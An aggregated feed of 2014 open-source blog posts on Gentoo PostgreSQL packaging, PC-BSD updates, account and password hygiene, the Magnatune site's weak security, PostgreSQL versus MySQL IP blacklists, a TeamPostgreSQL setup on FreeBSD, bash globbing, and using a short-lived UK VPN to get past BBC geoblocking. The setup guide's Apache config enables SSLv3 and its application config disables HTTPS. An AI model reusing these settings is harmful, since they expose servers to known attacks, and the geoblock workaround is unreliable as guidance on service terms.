I’m to blame for pressing forward with the splitting the ebuilds to -docs, -base, and -server when I first got started in Gentoo. I knew from the outset that having them split was not a good idea. I just didn’t know as much as I do now to defend one way or the other. To be fair, Patrick (bonsaikitten) would have gone with whatever I decided to do, but I thought I understood the advantages. Now I look at it and just see disadvantages.

Let’s first look at the build times for building the split ebuilds:

1961.35user 319.42system 33:59.44elapsed 111%CPU (0avgtext+0avgdata 682896maxresident)k
46696inputs+2000640outputs (34major+34350937minor)pagefaults 0swaps
1955.12user 325.01system 33:39.86elapsed 112%CPU (0avgtext+0avgdata 682896maxresident)k
7176inputs+1984960outputs (33major+34349678minor)pagefaults 0swaps
1942.90user 318.89system 33:53.70elapsed 111%CPU (0avgtext+0avgdata 682928maxresident)k
28496inputs+1999688outputs (124major+34343901minor)pagefaults 0swaps
And now the unified ebuild:

1823.57user 278.96system 30:29.20elapsed 114%CPU (0avgtext+0avgdata 683024maxresident)k
32520inputs+1455688outputs (100major+30199771minor)pagefaults 0swaps
1795.63user 282.55system 30:35.92elapsed 113%CPU (0avgtext+0avgdata 683024maxresident)k
9848inputs+1456056outputs (30major+30225195minor)pagefaults 0swaps
1802.47user 275.66system 30:08.30elapsed 114%CPU (0avgtext+0avgdata 683056maxresident)k
13800inputs+1454880outputs (49major+30193986minor)pagefaults 0swaps
So, the unified ebuild is about 10% faster than the split ebuilds.

There are also a few bugs open that will be resolved by moving to a unified ebuild. Whenever someone changes anything in their flags, Portage tends to only pick up dev-db/postgresql-server as needing to be recompiled rather than the appropriate dev-db/postgresql-base, which results in broken setups and failures to even build. I’ve even been accused of pulling the rug out from under people. I swear, it’s not me…it’s Portage…who I lied to. Kind of.

There should be little interruption, though, to the end user. I’ll be keeping all the features that splitting brought us. Okay, feature. There’s really just one feature: Proper slotting. Portage will be informed of the package moves, and everything should be hunky-dory with one caveat: A new ‘server’ USE flag is being introduced to control whether to build everything or just the clients and libraries.

No, I don’t want to do a lib-only flag. I don’t want to work on another hack.

You can check out the progress on my overlay. I’ll be working on the updating the dependent packages as well so they’re all ready to go in one shot.

Ramblings on audiobooks

by Flameeyes via Flameeyes's Weblog »

In one of my previous posts I have noted I'm an avid audiobook consumer. I started when I was at the hospital, because I didn't have the energy to read — and most likely, because of the blood sugar being out of control after coming back from the ICU: it turns out that blood sugar changes can make your eyesight go crazy; at some point I had to buy a pair of €20 glasses simply because my doctor prescribed me a new treatment and my eyesight ricocheted out of control for a week or so.

Nowadays, I have trouble sleeping if I'm not listening to something, and I end up with the Audible app installed in all my phones and tablets, with at least a few books preloaded whenever I travel. Of course as I said, I keep the majority of my audiobooks in the iPod, and the reason is that while most of my library is on Audible, not all of it is. There are a few books that I have bought on iTunes before finding out about Audible, and then there are a few I received in CD form, including The Hitchhiker's Guide To The Galaxy Complete Radio Series which is my among my favourite playlists.

Unfortunately, to be able to convert these from CD to a format that the iPod could digest, I ended up having to buy a software called Audiobook Builder for Mac, which allows you to rip CDs and build M4B files out of them. What's M4B? It's the usual mp4 format container, just with an extension that makes iTunes consider it an audiobook, and with chapter markings in the stream. At the time I first ripped my audiobooks, ffmpeg/libav had no support for chapter markings, so that was not an option. I've been told that said support is there now, but I have not tried getting it to work.

Indeed, what I need to find out is how to build an audiobook file out of a string of mp3 files, and I have no idea how to fix that now that I no longer have access to my personal iTunes account on a mac to re-download the Audiobook Builder and process them. In particular, the list of mp3s that I'm looking forward to merge together are the years 2013 and 2014 of BBC's The News Quiz, to which I'm addicted and listen continuously. Being able to join them all together so I can listen to them with a multi-day-running playlist is one of the very few things that still let me sleep relatively calmly — I say relatively because I really don't remember when was the last time I have slept soundly in about an year by now.

Essentially, what I'd like is for Audible to let me sideload some content (the few books I did not buy from them, and the News Quiz series that I stitch together from the podcast), and create a playlist — then for what I'm concerned I don't have to use an iPod at all. Well, beside the fact that I'd have to find a way to shut up notifications while playing audiobooks. Having Dragons of Autumn Twilight interrupted by the Facebook pop notification is not something that I'm looking forward for most of the time. And in some cases I even have had some background update disrupting my playback so there is definitely space for improvement.

PC-BSD at Fossetcon

by dru via Official PC-BSD Blog »

Fossetcon will take place September 11–13 at the Rosen Plaza Hotel in Orlando, FL. Registration for this event ranges from $10 to $85 and includes meals and a t-shirt.

There will be a BSD booth in the expo area on both Friday and Saturday from 10:30–18:30. As usual, we’ll be giving out a bunch of cool swag, PC-BSD DVDs, and FreeNAS CDs, as well as accepting donations for the FreeBSD Foundation.  Dru Lavigne will present “ZFS 101″ at 11:30 on Saturday. The BSDA certification exam will be held at 15:00 On Saturday.

PC-BSD 10.0.3 Quarterly Package Update Released

by dru via Official PC-BSD Blog »

The PC-BSD team is pleased to announce the availability of the next PC-BSD quarterly package update, version 10.0.3!

This update includes a number of important bug-fixes, as well as newer packages and desktops. Packages such as Chromium 37.0.2062.94, Cinnamon 2.2.14, Lumina 0.6.2 and more. This release also includes a CD-sized ISO of TrueOS, for users who want to install a server without X. For more details and updating instructions, refer to the notes below.

We are already hard at work on the next major release of PC-BSD, 10.1 later this fall, which will include FreeBSD 10.1-RELEASE under the hood. Users interested in following along with development should sign up for our Testing mailing list.

PC-BSD Notable Changes

* Cinnamon 2.2.14
* Chromium 37.0.2062.94
* NVIDIA Driver 340.24
* Lumina desktop 0.6.2-beta
* Pkg 1.3.7
* Various fixes to the Appcafe Qt UI
* Bugfixes to Warden / jail creation
* Fixed a bug with USB media not always being bootable
* Fixed several issues with Xorg setup
* Improved Boot-Environments to allow “beadm activate” to set default
* Support for jail “bulk” creation via Warden
* Fixes for relative ZFS dataset mount-point creation via Warden
* Support for full-disk (GELI) encryption without an unencrypted /boot partition

TrueOS

Along with our traditional PC-BSD DVD ISO image, we have also created a CD-sized ISO image of TrueOS, our server edition.

This is a text-based installer which includes FreeBSD 10.0-Release under the hood. It includes the following features:

* ZFS on Root installation
* Boot-Environment support
* Command-Line versions of PC-BSD utilities, such as Warden, Life-Preserver and more.
* Support for full-disk (GELI) encryption without an unencrypted /boot partition

We have some additional features also in the works for 10.1 and later, stay tuned this fall for more information.

Updating

Due to some changes with how pkgng works, it is recommended that all users update via the command-line using the following steps:

# pkg update –f
# pkg upgrade pkg
# pkg update –f
# pkg upgrade
# pc-extractoverlay ports
# reboot

PKGNG may need to re-install many of your packages to fix an issue with shared library version detection. If you run into issues doing this, or have conflicts, please open a bug report with the output of the above commands.

If you run into shared library issues running programs after upgrading, you may need to do a full-upgrade with the following:

# pkg upgrade –f

Getting media

10.0.3 DVD/USB media can be downloaded from this URL via HTTP or Torrent.

Reporting Bugs
Found a bug in 10.0.3? Please report it (with as much detail as possible) to our new RedMine Database.

Account churn

by Flameeyes via Flameeyes's Weblog »

In my latest post I singled out ne of the worst security experiences I’ve had with a service, but that is by far not the only bad experience I had. Indeed, given that I’ve been actively hunting down my old accounts and tried to get my hands on them, I can tell you that I have plenty of material to fill books with bad examples.

First of all, there is the problem of migrating the email addresses. For the longest time I’ve been using my GMail address to register everywhere, but then I decided to migrate to use my own domain (especially since Gandi supports two factor authentication, which makes it much safer). Unfortunately that means that not only I have a bunch of accounts still on the old email address, but I also have duplicate accounts.

Duplicate accounts become even more tricky when you consider that I had my own company, which meant I had double accounts for things that did not allow me to ship sometimes with a VAT ID attached, and sometimes not. Sometimes I could close the accounts (once I dropped the VAT ID), and sometimes I couldn’t, so a good deal of them are still out there.

FInally, there are the services that are available in multiple countries but with country-specific accounts. Which, don’t be mistaken, does not mean that every country has its own account database! It simply means that a given account is assigned to a country and does not work on any other. In most cases you cannot even migrate your account across countries. This is the case, for instance, of OVH, and why I moved to Gandi but also of PayPal (in which the billing address is tied to the country of the account and can’t be changed), IKEA and -PSN- Sony Online Entertainment. The end result is that I have duplicated (or even triplicated) accounts to cover the fact I have lived in multiple countries by now.

Also, it turns out that I completely forgot how many services I registered to over the years. Yes I have the passwords as stored by Chrome, but that’s not a comprehensive list as some of the most critical passwords have never been saved there (such as my bank’s password), plus some websites I have never used in Chrome, and at some point I had it clean the history of passwords and start from scratch. Some of the passwords have been saved in sgeps so I could look them up there, but even those are not a complete list. I ended up looking in my old email content to figure out which accounts I forgot having. The results have been fun.

But what about the grievances? Some of the accounts I wanted to gain access to again ended up being blocked or deleted, I’m surprised by the amount of services that either were killed, or moved around. At least three ebook stores I used are now gone, two of which absorbed by Kobo, while Marks & Spencer refused to recognize my email as valid, I assume they at some point reset their user database or something. Some of the hotel loyalty programs I signed up before and used once or twice disappeared, or were renamed/merged into something else. Not a huge deal but it makes account management a fun problem.

Then there are the accounts that got their password invalidated in the mean time, so even if I have a copy of it, it’s useless. Given that some accounts I had not logged into for years, that’s fair to happen: between leaks, heartbleed, and the overdue changes in best practices for password storage, I am more bothered by the services that did not invalidate my password in the mean time. But then again, there are different ways to deal with it. Some services when trying to login with the previous password point out that it’s no long valid and proceed with the same Forgotten password request workflow. Others will send you the password by email in plain text.

One quite egregious case happened with an Italian electronics shop, one of the first online-only stores I know of in Italy. Somehow, I knew that the account was still active, mostly because I could see their newsletter in the spam folder of my GMail account. So I went and asked for the password back, to change the address and stop the newsletter too (given I don’t live in Italy any longer), they sent me back the userid and password in cleartext. They reset their passwords in the mean time, and the default password became my Italian tax ID. Not very safe, if I were to know the user id of anyone else, knowing their tax ID is easy, as it can be calculated based on a few personal, but not so secret, details (full name, sex, date and city of birth).

But there is something worse than unannounced password resets. The dance of generating a new password. I have now the impression that it’s a minority of services that actually allow you to use whichever password you want. Lots of the services I have changed password for between last night and today required me to disable the non-alphanumeric symbols, because either they don’t support any non-alphanumeric character, or they only support a subset that LastPass does not let you select.

But this is not as bothersome as the length limitation of passwords. Most sites will be happy to tell you that they require a minimum of 6 or 8 characters for your password — few will tell you upfront the maximum length of a password. And very few of those that won’t tell you right away will fix the mistake by telling you when the password is too long, how long it can be. I even found sites that simply error out on you when you try to use a password that is not valid, and decide to invalidate both your old and temporary passwords, while not accepting the new one. It’s a serious pain.

Finally, I’ve enabled 2FA for as many services as I could; some of it is particularly bothersome (LinkedIn, I’ll probably write more about that), but at least it’s an extra safety. Unfortunately, I still find it extremely bothersome neither Google Authenticator nor RedHat’s FreeOTP (last time I tried) supported backing up the private keys of the configured OTPs. Since I switched between three phones in the past three months, I could use some help when having to re-enroll my OTP generators — I upgraded my phone, then had to downgrade because I broke the screen of the new one.

Von Delfinen und Elefanten im Netzwerk

by Jesco Freund via My Universe »

Gestern hatte ich die kühne Behauptung aufgestellt, es gebe technische Gründe, aus denen man PostgreSQL den Vorzug vor MySQL oder MariaDB geben könne. Heute möchte ich versuchen, das einmal anhand eines Beispiels aus der Praxis zu belegen. Dazu habe ich mir die Fähigkeit von PostgreSQL herausgepickt, mit Netzwerkadressen umgehen zu können.

Als Beispiel für die praktische Anwendung sei hier eine datenbankbasierte Blacklist genannt, die z. B. von einem Proxy, Spamfilter o. ä. genutzt wird. Für die anfragende Anwendung geht es dabei nur um die Frage, ob eine IP-Adresse in der Blacklist gesperrt ist oder nicht. Allerdings sollen nicht nur einzelne Hosts in der Blacklist definiert werden können, sondern auch Netzwerk-Segmente (also z. B. 192.168.0.0/24 oder 2001:db8::/64).

Vom Elefanten

PostgreSQL bringt für IP-Adressen zwei eigene Datentypen mit, inet und cidr. Ersterer ist der flexiblere der beiden Typen und kann sowohl mit Netzwerken als auch Hosts umgehen. Besonders nützlich sind die zugehörigen Operatoren; insbesondere die contain-Operatoren <<, <<=, >> und >>= machen die gestellte Aufgabe zum Kinderspiel.

Eine passende Tabelle mit fortlaufender numerischer ID, Beschreibung und Zeitstempel lässt sich unter PostgreSQL mit folgendem SQL Statement erstellen:

CREATE TABLE acl_blacklist (  
    id serial PRIMARY KEY,
    ip inet,
    description character varying(255),
    created timestamp with time zone DEFAULT LOCALTIMESTAMP
);
Um ein wenig mit der Blacklist zu spielen, fügen wir zwei Beispiel-Netze und einen Host in die Blacklist ein:

INSERT INTO acl_blacklist (ip, description) VALUES  
    ('192.168.0.0/24', 'My evil IPv4 net'),
    ('2001:db8::/64', 'My evil IPv6 net'),
    ('10.0.1.5', 'My evil IPv4 host');
Eine Ausgabe der Tabelle sieht nun also so aus:

 id |       ip       |    description    |            created            
----+----------------+-------------------+-------------------------------
  1 | 192.168.0.0/24 | My evil IPv4 net  | 2014-09-07 13:36:28.718252+02
  2 | 2001:db8::/64  | My evil IPv6 net  | 2014-09-07 13:36:28.718252+02
  3 | 10.0.1.5       | My evil IPv4 host | 2014-09-07 13:36:28.718252+02
Ob eine IP-Adresse nun durch die Blacklist gesperrt wurde oder nicht, lässt sich mit einem kurzen SQL Statement feststellen:

SELECT 1 FROM acl_blacklist WHERE '192.168.0.1' <<= acl_blacklist.ip;  
Diese Abfrage liefert folgendes Ergebnis:

 ?column? 
----------
        1
(1 row)
Mit einer IP-Adresse, die nicht durch die Blacklist gesperrt wurde (z. B. 192.168.1.1) sieht das Ergebnis dann so aus:

 ?column? 
----------
(0 rows)
Mit IPv6-Adressen funktioniert das natürlich auch:

SELECT 1 FROM acl_blacklist WHERE '2001:db8::5' <<= acl_blacklist.ip;  
 ?column? 
----------
        1
(1 row)
SELECT 1 FROM acl_blacklist WHERE '2001:db8:1::5' <<= acl_blacklist.ip;  
?column? 
----------
(0 rows)

Vom Delfin

MySQL bringt keinen eigenen Datentyp für IP-Adressen mit. Mit Hilfe eingebauter Funktionen lässt sich dennoch ein Workaround schaffen, mit dem eine vergleichbare Funktionalität wie unter PostgreSQL gegeben ist. Allerdings muss die Prüfung jeweils für IPv4 und IPv6 separat erfolgen; daher beschränkt sich das Beispiel nur auf IPv4.

Analog zu PostgreSQL wird zunächst eine Blacklist-Tabelle angelegt:

CREATE TABLE `acl_blacklist` (  
    `id` serial PRIMARY KEY,
    `ip` varchar(16) NOT NULL,
    `mask` tinyint(3) unsigned NOT NULL,
    `description` varchar(255) NOT NULL,
    `created` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
);
IP-Adresse und Netzmaske werden hier in separaten Feldern gespeichert. So kann später mit Hilfe der Funktion INET_ATON ein vergleichbares Abfrageergebnis wie unter PostgreSQL erzielt werden.

Auch hier fügen wir für Testzwecke einen Host und ein Netzwerk in die Tabelle ein:

INSERT INTO `acl_blacklist` (`ip`, `mask`, `description`) VALUES  
    ('192.168.0.0', 24, 'My evil IPv4 net'),
    ('10.0.1.5', 32, 'My evil IPv4 host');
Die Tabelle sieht nun also wie folgt aus:

+----+-------------+------+-------------------+---------------------+
| id | ip          | mask | description       | created             |
+----+-------------+------+-------------------+---------------------+
|  1 | 192.168.0.0 |   24 | My evil IPv4 net  | 2014-09-07 14:15:21 |
|  2 | 10.0.1.5    |   32 | My evil IPv4 host | 2014-09-07 14:15:21 |
+----+-------------+------+-------------------+---------------------+
So weit halten sich die Unterschiede zu PostgreSQL noch in Grenzen. Die Abfrage, ob eine IP durch die Blacklist gesperrt wurde, gestaltet sich allerdings ungleich komplexer als bei PostgreSQL:

SELECT 1 FROM `acl_blacklist` WHERE  
    SUBSTRING(LPAD(BIN(INET_ATON('192.168.0.1')), 32, 0), 1, `acl_blacklist`.`mask`) = 
    SUBSTRING(LPAD(BIN(INET_ATON(`acl_blacklist`.`ip`)), 32, 0), 1, `acl_blacklist`.`mask`);
Das Ergebnis sieht genauso aus wie unter PostgreSQL (von Formatspezifika der jeweiligen Command Line Interfaces einmal abgesehen):

+---+
| 1 |
+---+
| 1 |
+---+
1 row in set (0.00 sec)  
Mit einer IP-Adresse, die nicht durch die Blacklist gesperrt wurde (z. B. 192.168.1.1) sieht das Ergebnis dann so aus:

Empty set (0.00 sec)  
IPv6-Unterstützung ließe sich übrigens noch einbauen, indem die WHERE Bedingung in der Abfrage mit OR ergänzt wird, wobei dann die IPv6-spezifische Funktion INET6_ATON genutzt werden muss. Außerdem muss das Datenfeld für die IP-Adresse dann entsprechend größer dimensioniert werden.

Fazit

Zumindest in dieser Disziplin schlägt der Elefant den Delfin — und das nicht nur in Sachen Komplexität und Handhabbarkeit, sondern interessanterweise auch in Sachen Abfrageperformance. Der Grund dürfte wohl darin zu suchen sein, dass die Operatoren in PostgreSQL durch eine schnelle, interne Implementierung realisiert wurden, während die verschachtelten Funktionsaufrufe in MySQL unweigerlich zu einer Performance-Einbuße führen.

Bypassing Geolocation …

by Jeremy Olexa via jOlexa.net »

By now we all know that it is pretty easy to bypass geolocation blockage with a web proxy or vpn service. After all, there is over 2 million google results on “bbc vpn” … and I wanted to do just that to view a BBC show on privacy and the dark web.

I wanted to set this up as cheaply as possible but not use a service that I had to pay for a month since I only needed one hour. This requirement directed me towards a do-it-yourself solution with an hourly server in the UK. I also wanted reproducibility so that I could spin up a similar service again in the future.

My first attempt was to route my browser through a local SOCKS proxy via ssh tunneling, ssh -D 2001 user@uk-host.tld. That didn’t work because my home connection was not good enough to stream from BBC without incessant buffering.

Hmm, if this simple proxy won’t work then that strikes out many other ideas, I needed a way to use the BBC iPlayer Downloader to view content offline. Ok, but the software doesn’t have native proxy support (naturally). Maybe you could somehow use TOR and set the exit node to the UK. That seems like a poor/slow idea.

I ended up routing all my traffic through a personal OpenVPN server in London and then downloaded the show via the BBC software and watched it in HD offline. The goal was to provision the VPN as quickly as possible (time is money). A Linode StackScript is a feature that Linode offers, it is a user defined script ran at first boot of your host. Surprisingly, no one published one to install OpenVPN yet. So, I did: “Debian 7.5 OpenVPN” – feel free to use it on the Linode service to boot up a vpn automatically. It takes about two minutes to boot, install, and configure OpenVPN this way. Then you download the ca.crt and client configuration from the newly provisioned server and import it into your client.

End result: It took 42 minutes for me to download a one hour show. Since I shut down the VPN within an hour, I was charged the Linode minimum, $.015 USD. Though I recommend Linode (you can use my referral link if you want), this same concept applies to any provider that has a presence in the UK, like Digital Ocean who charges $.007/hour.

Addendum: Even though I abandoned my first attempt, I left the browser window open and it continued to download even after I was disconnected from my UK VPN. I guess BBC only checks your IP once then hands you off to the Akamai CDN. Maybe you only need a VPN service for a few minutes?

I also donated money to a BBC sponsored charity to offset some of my bandwidth usage and freeloading of a service that UK citizens have to pay for, I encourage you to do that same. For reference it costs a UK household, $.02 USD tax per hour for BBC. (source)

Anatomy of a security disaster

by Flameeyes via Flameeyes's Weblog »

I have made a note of this in my previous post about Magnatune being terribly insecure. Those who follow me on Twitter or Google+ already got the full details of it but I thought I would repeat them here. And add a few notes about that.

I remember Magnatune back in the days in which I hang around #amarok and helped with small changes here and there, and bigger changes for xine itself. It was at the time often used as an example of good DRM-less services. Indeed, it sold DRM-free music way before Apple decided to drop its own music DRM, and its still one of the few services selling lossless music — if we exclude Humble Bundle and the games OSTs.

But then again, this is not a license to have terrible security, which is what Magnatune has right now. After naming Magnatune in my the aforementioned post I realized that I had not given it a new, good password but it’s instead still using one of the old passwords I used to use, which are both insecure by themselves, a bit too short, possibly suitable to dictionary attacks, and I was not even sure if it was using the password I used by default on many services before, which is of course terrible, and was most likely leaked at multiple points in time — at least my old Adobe account was involved in their big leak.

As I said before, I stopped using fixed passwords some time last year, and then I decided to jump on LastPass when Heartbleed required me to change passwords almost everywhere. But it takes a while to change passwords in all your accounts, especially when you forget about some accounts altogether, like the Magnatune one above.

So I went to Magnatune website to change my password, but of course I forgot what the original was, so I went on and decided to follow the procedure for forgotten passwords. The first problem happens here: it does not require me to know which email address I registered with, instead it asks me (alternatively) for an username, which is quite obvious (Flameeyes, what else? There are very few sites where I use different usernames, one of which being Tumblr, and that’s usually because Flameeyes is taken). When I type that in, it actually shows me on the web page the email address I’m registered with.

What? This is a basic privacy issue: if it wasn’t that I actually don’t vary my email addresses that much, an attacker could now find an otherwise private email address. Worse yet, by using the users available in previous dumps, it’s possible to assign them to email addresses, too. Indeed, A quick check provided me with at least one email address of a friend of mine by just using her usual username — I already knew the email address but that shouldn’t be a given.

Anyway, I got an email back from Magnatune just a moment later. The email contains the password in plain text, which indicates they store it that way, which is bad practice. A note about plain text passwords: there is no way to prove beyond any doubt that a service is hashing (or hashing and salting) user passwords, but you can definitely prove otherwise. If you receive your password back in plain text when you say you forgot it, then the service does not store hashed passwords. Conversely, even if the service sends you a password reset link instead, it’s still possible it’s storing the plain text password. This is most definitely unfortunate.

Up to here, things would be bad but not that uncommon, as the linked Plain Text Offenders site above would show you — and I have indeed submitted a screenshot of the email to them. But there is one more thing you can find out from the email they sent. You may remember that some months ago I wrote about email security and around the same time so did the Google Official blog – for those who wonder, no I had no idea that such a post was being written and the similar timing was a complete coincidence – so what’s the status of Magnatune? Well, unfortunately it’s bleak, as they don’t encrypt mail in transit:

Received: from magnatune.com ([64.62.194.219])
        by mx.google.com with ESMTP id h11si9367820pdl.64.2014.08.28.15.47.42
        for <f********@*****.***>;
        Thu, 28 Aug 2014 15:47:42 -0700 (PDT)
If the sending server spoke TLS to the GMail server (yes it’s gmail in the address I censored), it would have shown something like (version=TLSv1.2 cipher=ECDHE-RSA-AES128-GCM-SHA256 bits=128/128); (which appears in the comment messages I receive from my own blog).

Not encrypting the email in transit means that anybody that could have sniffed the traffic coming out of Magnatune’s server would be able to access any of their customers’ accounts: they just need to snoop the email traffic and they can receive all the password. Luckily, the email server from which the email arrived is hosted at a company I trust very much, as I’m their customer too.

So I tried logging in with my username and newly-reminded password, unfortunately my membership expired years ago, which means I get no access at all — so I can’t even change my password or my email address. Too bad. But then it allowed me to figure out some more problems with the security situation of Magnatune.

When you try to login, you get sent on a different website depending on which kind of membership you subscribe(d) to. In my case I got the download membership — when you go there, you get presented with a dialog requesting user and password from your browser. It’s standard HTTP based authentication. It’s not very common because it’s not really user friendly: you can’t serve any content until the user either puts the right username/password or decides they don’t know a valid combination and cancel the dialog, in which case a final 401 error is reported, and whichever content the server sent will be displayed by the browser.

Beside the userfriendliness (or lack thereof), HTTP authentication can be tricky, too. There are two ways to provide authentication over HTTP, one is Basic and the other is Digest — neither is very secure by default. Digest is partially usable, but suffer from lack of authentication of parties, making MitM attacks trivial, while Basic, well, allows a sniffer to figure out username and password as they travel in plaintext over the wire. HTTP authentication is, though, fairly secure if you use it in conjunction with TLS. Indeed for some of my systems I use HTTP authentication on a HTTPS connection, as it allows me to configure the authentication at the web server level without support from the application itself.

What became obvious to me while failing to log in to Magnatune was that the connection was not secure: it was cleartext HTTP that it was trying to get me to log in through. So I checked the headers to figure out which kind of authentication it was doing. At this point I have to use “of course” to say that it is using Basic authentication: cleartext username and password on the wire. This is extremely troublesome.

While not encrypting email reduces the attack surface, making it mostly a matter of people sniffing at the datacenter where Magnatune is hosted – assuming you use an email provider that is safe or trustworthy enough, I consider mine so – using basic authentication extend the surface immensely. Indeed, if you’re logging in Magnatune from a coffee shop or any other public open WiFi, you are literally broadcasting over the network your username and password.

I can’t know if you can change your Magnatune password once you can log in, since I can’t log in. But I know that the alternative to the download membership is the streaming membership, which makes it very likely that a Magnatune user would be logging in while at a Starbucks, so that they can work on some blog post or on source code of their mobile app while listening to music. I would hope they used a different password for Magnatune than for their email address — since as I noted above, you can get to their email address just by knowing their username.

I don’t worry too much. My Magnatune password turned out to be different enough from most of my other passwords that even if I don’t change it and gets leaked it won’t compromise any other service. Even more so now that I’m actively gathering all my account and changing their passwords.

Elefantenhaus

by Jesco Freund via My Universe »

Es gibt zahlreiche technische Gründe, aus denen man PostgreSQL einem anderen RDBMS wie MySQL oder MariaDB vorziehen wollen könnte — letztlich kommt es aber auf das Einsatzszenario an, weshalb es auch für MySQL & Co gute Gründe (wie z. B. Lesegeschwindigkeit) und auch weniger gute Gründe (wie z. B. Wordpress' Fixierung auf MySQL) geben kann.

Es gibt aber auch ein gewichtiges nicht-technisches Argument für den blauen Elefanten: Monty & Co haben beschlossen, mit MariaDB 10 die Kompatibilität zu MySQL zumindest teilweise zu brechen, und derzeit ist noch kaum absehbar, welches der beiden Datenbanksysteme sich langfristig durchsetzen wird; geschweige denn wie Applikationen mit den aller Voraussicht nach wachsenden Inkompatibilitäten umgehen werden.

Wer nun — aus welchen Gründen auch immer — auf PostgreSQL umsteigen möchte, wird früher oder später die Frage nach einer vernünftigen, webbasierten Administrationsoberfläche stellen; schließlich gibt es für MySQL mit phpMyAdmin ein recht ausgereiftes Werkzeug. Die Standard-Antwort lautet meist phpPgAdmin; ein Tool jedoch, das mittlerweile arg altbacken daher kommt und dessen Weiterentwicklung dem Anschein nach eher schleppend verläuft.

Eine wirklich gute Alternative findet sich mit TeamPostgreSQL, das eine moderne, AJAX-basierte Oberfläche bietet und jede Menge nützlicher Fähigkeiten mitbringt, wie z. B. einen SQL Editor mit Auto Completion oder in-line Bearbeitung von Datensätzen. Einziger Wermutstropfen: Es handelt sich hier um eine Java Webapplikation, was das Deployment vermeintlich kompliziert macht — zumal der Software zur Zeit jegliche Dokumentation fehlt.

Dem ist jedoch nicht wirklich so. Für ein solides Produktivsystem sollte aber nicht der eingebaute Jetty-Container genutzt werden, sondern ein „erwachsener“ Servlet Container wie z. B. Apache Tomcat. Unter FreeBSD kann man den nebst Abhängigkeiten bequem per pkg installieren. TeamPostgreSQL installiert sich dann schon (fast) von allein…

pkg ins tomcat8

cat >> /etc/rc.conf << EOF  
tomcat8_enable="YES"  
EOF

cd ~  
fetch http://cdn.webworks.dk/download/teampostgresql_multiplatform.zip  
unzip teampostgresql_multiplatform.zip  
cd teampostgresql  
cp -r webapp /usr/local/apache-tomcat-8.0/webapps/  
cd /usr/local/apache-tomcat-8.0/webapps/  
mv webapp teampostgresql  
chown -R www:www teampostgresql  
mkdir -p /usr/local/apache-tomcat-8.0/work/Catalina/localhost/teampostgresql  
chown www:www /usr/local/apache-tomcat-8.0/work/Catalina/localhost/teampostgresql  
Nun fehlt nur noch eine brauchbare Konfiguration für TeamPostgreSQL. Diese legt man in der Datei webapps/teampostgresql/WEB-INF/teampostgresql-config.xml ab (eine Datei mit Standardwerten ist bereits vorhanden und muss nur aktualisiert werden):

<?xml version="1.0" encoding="UTF-8"?>  
<config xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="config">  
    <adminuser>myadmin</adminuser>
    <adminuserpassword>t0ps3cr3t</adminuserpassword>
    <anonymousaccess>10</anonymousaccess>
    <anonymousprofile>0</anonymousprofile>
        <datadirectory>/usr/local/apache-tomcat-8.0/work/Catalina/localhost/teampostgresql</datadirectory>
    <https>DISABLED</https>
</config>  
Nun kann Tomcat gestartet werden:

service tomcat8 start  
Und ab sofort sollte TeamPostgreSQL unter /teampostgresql verfügbar sein. Wer dem Tool eine eigene Subdomain spendieren möchte und ohnehin bereits einen Reverse Proxy betreibt, kann etwa folgende Konfiguration verwenden:

<VirtualHost [2001:db8::1]:80>  
    ServerName pgsql.example.com
    ErrorLog /var/log/pgsql-error.log
    CustomLog /var/log/pgsql-access.log combined
    ServerAdmin webmster@example.com

    RewriteEngine on
    RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [L,R=permanent]

    ProxyRequests Off
    <Proxy *>
        Require all denied
    </Proxy>
</VirtualHost>

<VirtualHost [2001:db8::1]:443>  
    ServerName pgsql.example.com
    ErrorLog /var/log/pgsql-error-ssl.log
    CustomLog /var/log/pgsql-access-ssl.log "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %>s %b \"%{cache-status}e\" \"%{User-Agent}i\""
    ServerAdmin webmaster@example.com

    SSLEngine On
    SSLProtocol -ALL +SSLv3 +TLSv1 +TLSv1.1 +TLSv1.2
    SSLCipherSuite ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES256-SHA384:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA:!RC4:HIGH:!MD5:!aNULL:!EDH
    SSLHonorCipherOrder on
    SSLCompression off
    SSLCertificateFile "/usr/local/etc/ssl/cert/server-cert.pem"
    SSLCertificateKeyFile "/usr/local/etc/ssl/keys/server-key.pem"
    SSLCertificateChainFile "/usr/local/etc/ssl/ca/server-ca.pem"
    Header add Strict-Transport-Security "max-age=15768000"
    ServerSignature Off

    ProxyTimeout 25
    ProxyRequests Off
    ProxyPass / http://127.0.0.1:8080/teampostgresql/
    ProxyPassReverse / http://127.0.0.1:8080/teampostgresql/
    ProxyPreserveHost On
</VirtualHost>  
Damit wird es möglich, Tomcat nicht weiter nach außen hin zu exponieren und die Webapplikation zusätzlich über SSL zu schützen.

Bash pitfalls: globbing everywhere!

by Michał Górny via Michał Górny »

Bash has many subtle pitfalls, some of them being able to live unnoticed for a very long time. A common example of that kind of pitfall is ubiquitous filename expansion, or globbing. What many script writers forget about to notice is that practically anything that looks like a pattern and is not quoted is subject to globbing, including unquoted variables.

There are two extra snags that add up to this. Firstly, many people forget that not only asterisks (*) and question marks (?) make up patterns — square brackets ([) do that as well. Secondly, by default bash (and POSIX shell) take failed expansions literally. That is, if your glob does not match any file, you may not even know that you are globbing.

It's all just a matter of running in the proper directory for the result to change. Of course, it's often unlikely — maybe even close to impossible. You can work towards preventing that by running in a safe directory. But in the end, writing predictable software is a fine quality.

How to notice mistakes?

Bash provides a two major facilities that could help you stop mistakes — shopts nullglob and failglob.

The nullglob option is a good choice for a default for your script. After enabling it, failing filename expansions result in no parameters rather than verbatim pattern itself. This has two important implications.

Firstly, it makes iterating over optional files easy:

for f in a/* b/* c/*; do
    some_magic "${f}"
done
Without nullglob, the above may actually return a/* if no file matches the pattern. For this reason, you would need to add an additional check for existence of file inside the loop. With nullglob, it will just ‘omit’ the unmatched arguments. In fact, if none of the patterns match the loop won't be run even once.

Secondly, it turns every accidental glob into null. While this isn't the most friendly warning and in fact it may have very undesired results, you're more likely to notice that something is going wrong.

The failglob option is better if you can assume you don't need to match files in its scope. In this case, bash treats every failing filename expansion as a fatal error and terminates execution with an appropriate message.

The main advantage of failglob is that it makes you aware of any mistake before someone hits it the hard way. Of course, assuming that it doesn't accidentally expand into something already.

